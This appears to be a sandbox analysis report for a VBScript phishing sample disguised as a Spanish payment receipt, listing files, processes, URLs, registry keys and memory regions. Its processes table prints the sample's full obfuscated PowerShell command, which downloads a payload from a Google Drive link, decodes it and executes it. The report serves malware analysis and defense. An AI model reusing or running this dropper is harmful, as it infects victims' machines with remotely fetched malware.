Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
JUSTIFICANTE DE PAGO.vbs
|
ASCII text, with very long lines (363), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cadvkh4.xq1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytfrpog2.4mu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Trangstilflde.Per
|
HTML document, ASCII text, with very long lines (1692), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function
Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically
-lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function
popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl
degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H
nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1
Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl
iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs
r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn.
A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli
.lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5
TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet
'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt
Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt
Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom;
Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs
Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet
' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul
PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess
(Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba
shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls
F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo
dg8u,sea=Vic.u$Ge erMUnciabDrvtylDon ee PutnmGlyc ePlat nskovttamalgsopvel.rabb.sAnacep Bltel .ouni.loritSpand(Nstfo$FiskeGBard,aPajamsTuetuhAl,ereCiselsHyp
r)Immun ');$Mblements=$Slinter48[0];popess (Agonothet ' seam$Hel.cgArbejlPolygoStadfb Bulea mil ludska: St tREro,ru MatrbGrailrPiot,iExtercHalimeBy.gersti.ueCompasDeafe1Ethan0Almsd7Linea=
Ud,tNMineseUd,ikwDeute-K.ystOMarkibEks mjMillieMondncUndelt.rapp BivirSSkizoymuntrs GingtPi.seeDampemArta,.Z nneNSovekeKatystBehag.LimbeWDecaseBillyb
obulC.rilal PalaiPjecee,oresnMelletPenna ');popess (Agonothet 'Over.$ YounR RaceuS.ralb lectrFamiliMask.cDi feeHu rarNondeeAxhamsg,bbe1
reol0 Snub7Kri.e.Afr,dHBand.eAktivaMyotod Afkae c tarHegnssValgk[Fa le$Ere.tUEasygn billthasteeOmdebsPalertVisu a ZonkbDockilRo.eseStr,a2Hjeml7
Hjlp]Mi.la=Godsv$MicroSSte.st NudleBestrnHercutNons,r Ba.oyIm.otkGarruk FolkeMaillrIndreiSynale outdrCykeln un eeSuper ');$celandines=Agonothet
'Nbfl.RRa.bruTrst,bOtorrrYpperi,abatcFlommenamnarBranceScreesLindy1.edev0Un.er7Bolon. Eta.D Co loChariwTaarnnSoleml ScanoEks
ea TreddS.ambF rudeimo,talKadeneMesat(,earf$GaardMBrystbClumplN,biaeGatt mLrepleFittinP,eintCordesUns,o,wi.es$ KompIProt,sBllebdP
rickAfs ukPinnieRetab4Efter7 Dec,)Peace ';$celandines=$Constantias[1]+$celandines;$Isdkke47=$Constantias[0];popess (Agonothet
'Konvo$D sksg .arml ChamoSpdb bForekaOver lDipht:Cit,zhSuffeyForkrdListerVoryso ndymcSpageoTeserrAmantaDab,ilSu.ab=Forem(TraveTMalmieDuknasChlortTo,tu-niobePHa,ndaFejlmt
Floth Zadr Men,o$GardeI NivesEpis,dTilbjkRembuk Forge cond4 .jib7Ri.ou)Flirt ');while (!$hydrocoral) {popess (Agonothet 'Drags$
La.egFlo hlLandsoVelgrbPoloeaPremalProgr:me,akDAfregiGirenfHairnfV.jnieKalkurTrstieAfpilnDi hocSuetsiF.actnLan vgGrf.e=Infor$MorgetFakturT
ldfuO.stneyderk ') ;popess $celandines;popess (Agonothet 'ApertS Biomt Fonda ObserAnstrtBu.fo-SearcSSa,tal ExpoeU,skyePneu,pCra
l Twib4Scute ');popess (Agonothet 'H lpe$ ForsgTaknelZosteo Brugbsvvefa Ge.mlModst:K.wieh prrsy,umildBravurGenudoFeriecZapuso
Strur RuskaBloddl Int,=Smaln(LamelTDichoeHa mosQu.nntTin,f-Snup,P,aaseaDisp,tJudash Blan ryg v$Tax eIPiscasKli,kdEcheskNetkokT,aere
Canz4 aund7t.ene).ngou ') ;popess (Agonothet 'Disda$ PrergScenalTouchoTra sbD finaSprinlHist :ReproSBiomat Vetco PistwAfbrnwRundtoVeeenoOrthodMythi3Unifo0Kines=Levem$Beva,gDiscelSekito.avfobTe.miarevlelUdben:ReskoSF,ltstR
hearNe atgDa,legJurisaraketr UdvinSvarrs .ndesRu.katPlneroRutinf DopifProloeBlomsrAbands.tnkn+Moboc+Apoci%Delta$ EsopS.mitslAlvori
UnrenBisamt fvaneu,sacrFarv 4folke8El en.Liberc upero ilduH akpnSteept Anse ') ;$Mblements=$Slinter48[$Stowwood30];}popess
(Agonothet 'Tayr $ArmbagQueenlAllezo.mstnbkongsa FremlA.sik:Lege.DLo beo BienmEksameHjulssNden,tTap,oiFennekKohovv,afferEco
yeT rjel AndesSilkseSatisr,hilosBaksn Man,a=Sark. Vans GNed,ieAfkastgysen-AiramC B.droCapsinAdiabt KompeSprinn.isfutBolig
Phary$ O.onIAlkohsPlombdSenteklimpikKongeeSise.4homon7Bel.c ');popess (Agonothet 'Para,$Deemig Fllel sseoMulslb El,eam anelPs,lm:AgituTgang.eKastrn
PhenaNo,prkAffi,tMnstraAmbitk Fste In.er=frekv Fisk[LnsomS Stasy,onvisGlaivt SouveGlaismRudsk. TmthCIsopyo Gl.tnUnprov .jlle
Entrrdet ctMedit]Dagos:Endag:DecliFPermirStoppo GenemBelgiBJunipaRe.nfsKl.ppeFrtid6Cornc4Sp,roSAfndetTal.trAcrosiG.oedn MetagNarko(Trfor$
PseuDRailloWhi,emKeybde CystsTreattUnem iC pitk Funkv.idgerm.noseprvebl Venns Unsee uro rsvimls H.lt)Helio ');popess (Agonothet
'Bruse$magt gWag ilAvnedopupilbSaltaaBatiklSlukn: Mo,iR Legga Petrt esole s,ndpE.staeArenanAjoursUnderiStango ShronBlokm Sigil=Teend
Skils[CheneSSjipnyO togs vernt ruffeBrnepmSluts.Re,ssTTriloeCa,woxPureetArg.n. ChicE Inten.etshcBu,fpoBr.eod PubliAssonnMis.cgstarn]Tuill:Sulp
: poseA HennS AposC RsonI.versIK rsu.kommaGWusppeTi.stt HypeSS ifttLepidrHumifi ,otrnEk.prg,amme(Ba,lo$BourtTFalsieGainsnFrav,aG.dfokOp,evt
rmpa.ommekDysan)Bygni ');popess (Agonothet 'Alant$FladbgthramlFolkeo Livsb P.roaMe.halFiske:M,lleMShawwePreinnDecenu,njuraProfilTarint
Sti el,ehmrPres nKildeaDelbet R.fli BlatvOverie nudirB usksUn.az9.ntra3Janap=Termo$ FileRCh.mpaPrecitBagste CapipHuehueTillgnDrmmes
Nedkisph.gohu,tlnDilet.Syda.s Te,suHaa dbTrilos Sinst Syslr jentiVandsnflunkgCo vi( am,e3serig0 Kom,4Stjer6Jeep,8Dueur3Outsp,Steni2Cysti7
Argu6Tetan4Psych8Nitro)Lubri ');popess $Menualternativers93;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://go.micro
|
unknown
|
|
|
|
https://drive.usercontent.google.comX1
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.101.138
|
||
|
drive.usercontent.google.com
|
142.251.2.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.101.138
|
drive.google.com
|
United States
|
||
|
142.251.2.132
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7FF7C183B000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB800000
|
heap
|
page read and write
|
||
|
8FCAEFE000
|
stack
|
page read and write
|
||
|
7FF7C1B60000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1B10000
|
trusted library allocation
|
page read and write
|
||
|
1D95C830000
|
heap
|
page read and write
|
||
|
1D942930000
|
heap
|
page read and write
|
||
|
1D9464BA000
|
trusted library allocation
|
page read and write
|
||
|
ABF957C000
|
stack
|
page read and write
|
||
|
1A9CBA1C000
|
heap
|
page read and write
|
||
|
1D9544F1000
|
trusted library allocation
|
page read and write
|
||
|
1D942A70000
|
heap
|
page readonly
|
||
|
7FF7C1A80000
|
trusted library allocation
|
page read and write
|
||
|
ABF967E000
|
stack
|
page read and write
|
||
|
1D944576000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1A30000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1822000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1AC0000
|
trusted library allocation
|
page read and write
|
||
|
ABF95FF000
|
stack
|
page read and write
|
||
|
1D9428A0000
|
heap
|
page read and write
|
||
|
1D94652E000
|
trusted library allocation
|
page read and write
|
||
|
1D95C87F000
|
heap
|
page read and write
|
||
|
1D9547EB000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9EC000
|
heap
|
page read and write
|
||
|
1D95CBBE000
|
heap
|
page read and write
|
||
|
1A9CBA30000
|
heap
|
page read and write
|
||
|
1D942975000
|
heap
|
page read and write
|
||
|
1D9464E3000
|
trusted library allocation
|
page read and write
|
||
|
1D94297A000
|
heap
|
page read and write
|
||
|
ABF914E000
|
stack
|
page read and write
|
||
|
1A9CD35D000
|
heap
|
page read and write
|
||
|
1D94624B000
|
trusted library allocation
|
page read and write
|
||
|
1D944A1F000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9C0000
|
heap
|
page read and write
|
||
|
1D9460F2000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9AE000
|
heap
|
page read and write
|
||
|
1A9CB9CA000
|
heap
|
page read and write
|
||
|
1D9444EA000
|
heap
|
page read and write
|
||
|
7FF7C1824000
|
trusted library allocation
|
page read and write
|
||
|
1D95C925000
|
heap
|
page read and write
|
||
|
1D95CA10000
|
heap
|
page execute and read and write
|
||
|
1D942984000
|
heap
|
page read and write
|
||
|
1A9CB9ED000
|
heap
|
page read and write
|
||
|
7FF7C18DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A9CBA01000
|
heap
|
page read and write
|
||
|
7FF7C1AF0000
|
trusted library allocation
|
page read and write
|
||
|
1A9CBA44000
|
heap
|
page read and write
|
||
|
1D942A80000
|
trusted library allocation
|
page read and write
|
||
|
1D942996000
|
heap
|
page read and write
|
||
|
1A9CBA01000
|
heap
|
page read and write
|
||
|
7FF7C19D1000
|
trusted library allocation
|
page read and write
|
||
|
175B7CC0000
|
heap
|
page read and write
|
||
|
7FF7C1A20000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C19C0000
|
trusted library allocation
|
page read and write
|
||
|
1D9442E0000
|
trusted library allocation
|
page read and write
|
||
|
1A9CD354000
|
heap
|
page read and write
|
||
|
1A9CD350000
|
heap
|
page read and write
|
||
|
7FF7C1B20000
|
trusted library allocation
|
page read and write
|
||
|
1D9464A6000
|
trusted library allocation
|
page read and write
|
||
|
1D942900000
|
heap
|
page read and write
|
||
|
1A9CB9C2000
|
heap
|
page read and write
|
||
|
7FF7C18D6000
|
trusted library allocation
|
page read and write
|
||
|
1A9CBA01000
|
heap
|
page read and write
|
||
|
1A9CB9BE000
|
heap
|
page read and write
|
||
|
ABF9B3E000
|
stack
|
page read and write
|
||
|
1A9CD450000
|
heap
|
page read and write
|
||
|
1D9546A5000
|
trusted library allocation
|
page read and write
|
||
|
1D944A2C000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C19F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D942A40000
|
trusted library allocation
|
page read and write
|
||
|
8FCB3FE000
|
stack
|
page read and write
|
||
|
ABF947E000
|
stack
|
page read and write
|
||
|
7FF7C1823000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A9CBB7E000
|
heap
|
page read and write
|
||
|
1D942A60000
|
trusted library allocation
|
page read and write
|
||
|
ABF9A3E000
|
stack
|
page read and write
|
||
|
1D9429BF000
|
heap
|
page read and write
|
||
|
1D945E22000
|
trusted library allocation
|
page read and write
|
||
|
1D942982000
|
heap
|
page read and write
|
||
|
1A9CBA01000
|
heap
|
page read and write
|
||
|
1D95CB5C000
|
heap
|
page read and write
|
||
|
1D95CB67000
|
heap
|
page read and write
|
||
|
1D942B00000
|
heap
|
page read and write
|
||
|
1A9CBA01000
|
heap
|
page read and write
|
||
|
1D944E7B000
|
trusted library allocation
|
page read and write
|
||
|
1D95C8F2000
|
heap
|
page read and write
|
||
|
1A9CBA1C000
|
heap
|
page read and write
|
||
|
ABF993C000
|
stack
|
page read and write
|
||
|
1A9CB9D2000
|
heap
|
page read and write
|
||
|
7FF7C1B80000
|
trusted library allocation
|
page read and write
|
||
|
175B7D20000
|
heap
|
page read and write
|
||
|
1A9CBB79000
|
heap
|
page read and write
|
||
|
1D95C922000
|
heap
|
page read and write
|
||
|
7FF7C19DA000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1820000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1B50000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9E5000
|
heap
|
page read and write
|
||
|
7FF7C1940000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D94611F000
|
trusted library allocation
|
page read and write
|
||
|
175B7D15000
|
heap
|
page read and write
|
||
|
1D942A90000
|
heap
|
page execute and read and write
|
||
|
1D944719000
|
trusted library allocation
|
page read and write
|
||
|
1D94587B000
|
trusted library allocation
|
page read and write
|
||
|
ABFA68D000
|
stack
|
page read and write
|
||
|
7FF7C187C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D944A1D000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9E1000
|
heap
|
page read and write
|
||
|
7FF7C18D0000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9E2000
|
heap
|
page read and write
|
||
|
1A9CBA3E000
|
heap
|
page read and write
|
||
|
1D9427C0000
|
heap
|
page read and write
|
||
|
1A9CBA3E000
|
heap
|
page read and write
|
||
|
7FF7C1B40000
|
trusted library allocation
|
page read and write
|
||
|
ABF91CE000
|
stack
|
page read and write
|
||
|
1A9CB960000
|
heap
|
page read and write
|
||
|
1D944A42000
|
trusted library allocation
|
page read and write
|
||
|
1D946708000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9E5000
|
heap
|
page read and write
|
||
|
1A9CBA32000
|
heap
|
page read and write
|
||
|
7FF7C1840000
|
trusted library allocation
|
page read and write
|
||
|
ABF9BBB000
|
stack
|
page read and write
|
||
|
1D9444E0000
|
heap
|
page read and write
|
||
|
8FCACFE000
|
stack
|
page read and write
|
||
|
1A9CB9DD000
|
heap
|
page read and write
|
||
|
7FF7C1A90000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1BA0000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9E5000
|
heap
|
page read and write
|
||
|
1A9CBA38000
|
heap
|
page read and write
|
||
|
ABF99BE000
|
stack
|
page read and write
|
||
|
1D944E25000
|
trusted library allocation
|
page read and write
|
||
|
1D9443C5000
|
heap
|
page read and write
|
||
|
7FF7C1906000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF7C1AD0000
|
trusted library allocation
|
page read and write
|
||
|
1D9547DD000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9BA000
|
heap
|
page read and write
|
||
|
1A9CB98B000
|
heap
|
page read and write
|
||
|
6718AFE000
|
unkown
|
page read and write
|
||
|
7FF7C1B30000
|
trusted library allocation
|
page read and write
|
||
|
1D9444F1000
|
trusted library allocation
|
page read and write
|
||
|
67187CD000
|
stack
|
page read and write
|
||
|
1D944E12000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1B70000
|
trusted library allocation
|
page read and write
|
||
|
ABF98B9000
|
stack
|
page read and write
|
||
|
1D9466E2000
|
trusted library allocation
|
page read and write
|
||
|
8FCABFF000
|
stack
|
page read and write
|
||
|
1D95CD20000
|
heap
|
page read and write
|
||
|
ABF90C3000
|
stack
|
page read and write
|
||
|
1D9466FA000
|
trusted library allocation
|
page read and write
|
||
|
1D94671F000
|
trusted library allocation
|
page read and write
|
||
|
1D94670C000
|
trusted library allocation
|
page read and write
|
||
|
1A9CBA01000
|
heap
|
page read and write
|
||
|
7FF7C1B00000
|
trusted library allocation
|
page read and write
|
||
|
8FCB4FC000
|
stack
|
page read and write
|
||
|
1D95CA16000
|
heap
|
page execute and read and write
|
||
|
1A9CB9CB000
|
heap
|
page read and write
|
||
|
7FF7C19E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A9CB8E0000
|
heap
|
page read and write
|
||
|
7FF7C1A10000
|
trusted library allocation
|
page execute and read and write
|
||
|
ABF94FE000
|
stack
|
page read and write
|
||
|
ABF9ABE000
|
stack
|
page read and write
|
||
|
1D954562000
|
trusted library allocation
|
page read and write
|
||
|
1A9CBA48000
|
heap
|
page read and write
|
||
|
175B7AFB000
|
heap
|
page read and write
|
||
|
1D946133000
|
trusted library allocation
|
page read and write
|
||
|
1A9CBB78000
|
heap
|
page read and write
|
||
|
7FF7C1A70000
|
trusted library allocation
|
page read and write
|
||
|
1D9466E6000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1AB0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7C1A60000
|
trusted library allocation
|
page read and write
|
||
|
1D9442B0000
|
trusted library allocation
|
page read and write
|
||
|
1D94297E000
|
heap
|
page read and write
|
||
|
1D95CE30000
|
heap
|
page read and write
|
||
|
1D9544FF000
|
trusted library allocation
|
page read and write
|
||
|
175B7AD0000
|
heap
|
page read and write
|
||
|
1D9428C0000
|
heap
|
page read and write
|
||
|
1A9CB9CD000
|
heap
|
page read and write
|
||
|
7FF7C1A50000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9CB000
|
heap
|
page read and write
|
||
|
1A9CB9ED000
|
heap
|
page read and write
|
||
|
1D946529000
|
trusted library allocation
|
page read and write
|
||
|
1D942A24000
|
heap
|
page read and write
|
||
|
1A9CB9B2000
|
heap
|
page read and write
|
||
|
1D944A12000
|
trusted library allocation
|
page read and write
|
||
|
ABF97BF000
|
stack
|
page read and write
|
||
|
1A9CB9A2000
|
heap
|
page read and write
|
||
|
7FF7C1B90000
|
trusted library allocation
|
page read and write
|
||
|
7DF3FF850000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D944A28000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9ED000
|
heap
|
page read and write
|
||
|
7FF7C182D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D944B49000
|
trusted library allocation
|
page read and write
|
||
|
8FCB1FD000
|
stack
|
page read and write
|
||
|
1D95CB20000
|
heap
|
page read and write
|
||
|
1D942B05000
|
heap
|
page read and write
|
||
|
1D95CBA1000
|
heap
|
page read and write
|
||
|
1D9464CF000
|
trusted library allocation
|
page read and write
|
||
|
1A9CD352000
|
heap
|
page read and write
|
||
|
8FCAAFA000
|
stack
|
page read and write
|
||
|
1A9CB9ED000
|
heap
|
page read and write
|
||
|
1A9CB9E1000
|
heap
|
page read and write
|
||
|
175B7AC0000
|
heap
|
page read and write
|
||
|
1D944CD0000
|
trusted library allocation
|
page read and write
|
||
|
1D9443DB000
|
heap
|
page read and write
|
||
|
1D95C83B000
|
heap
|
page read and write
|
||
|
1A9CBB75000
|
heap
|
page read and write
|
||
|
ABFA60E000
|
stack
|
page read and write
|
||
|
ABF9779000
|
stack
|
page read and write
|
||
|
8FCB2FE000
|
stack
|
page read and write
|
||
|
1A9CB9DC000
|
heap
|
page read and write
|
||
|
1D95CA20000
|
heap
|
page read and write
|
||
|
1D95C950000
|
heap
|
page execute and read and write
|
||
|
7FF7C1A40000
|
trusted library allocation
|
page read and write
|
||
|
1D95C8A0000
|
heap
|
page read and write
|
||
|
1A9CBA2E000
|
heap
|
page read and write
|
||
|
7FF7C1AE0000
|
trusted library allocation
|
page read and write
|
||
|
1D95CA41000
|
heap
|
page read and write
|
||
|
1D9466FC000
|
trusted library allocation
|
page read and write
|
||
|
175B7AF0000
|
heap
|
page read and write
|
||
|
1D95C8A9000
|
heap
|
page read and write
|
||
|
1D946109000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB900000
|
heap
|
page read and write
|
||
|
1A9CBA0E000
|
heap
|
page read and write
|
||
|
1A9CBB70000
|
heap
|
page read and write
|
||
|
1A9CBA01000
|
heap
|
page read and write
|
||
|
1A9CB99F000
|
heap
|
page read and write
|
||
|
1A9CBA0B000
|
heap
|
page read and write
|
||
|
1D944AC6000
|
trusted library allocation
|
page read and write
|
||
|
ABF96FE000
|
stack
|
page read and write
|
||
|
1D944A30000
|
trusted library allocation
|
page read and write
|
||
|
1A9CB9DA000
|
heap
|
page read and write
|
||
|
1D95C843000
|
heap
|
page read and write
|
||
|
6718BFF000
|
stack
|
page read and write
|
||
|
1D9429C4000
|
heap
|
page read and write
|
||
|
1A9CB9BA000
|
heap
|
page read and write
|
||
|
1A9CB9BA000
|
heap
|
page read and write
|
||
|
7FF7C1830000
|
trusted library allocation
|
page read and write
|
||
|
1D946165000
|
trusted library allocation
|
page read and write
|
||
|
8FCAFFF000
|
stack
|
page read and write
|
||
|
1D942B0E000
|
heap
|
page read and write
|
||
|
7FF7C1A02000
|
trusted library allocation
|
page read and write
|
||
|
1A9CBA1C000
|
heap
|
page read and write
|
||
|
1D9443C0000
|
heap
|
page read and write
|
||
|
1A9CBB7D000
|
heap
|
page read and write
|
||
|
175B7D10000
|
heap
|
page read and write
|
||
|
1D944DC8000
|
trusted library allocation
|
page read and write
|
||
|
ABF9837000
|
stack
|
page read and write
|
||
|
ABFA58E000
|
stack
|
page read and write
|
||
|
1D95CB8D000
|
heap
|
page read and write
|
||
|
1A9CB98A000
|
heap
|
page read and write
|
There are 240 hidden memdumps, click here to show them.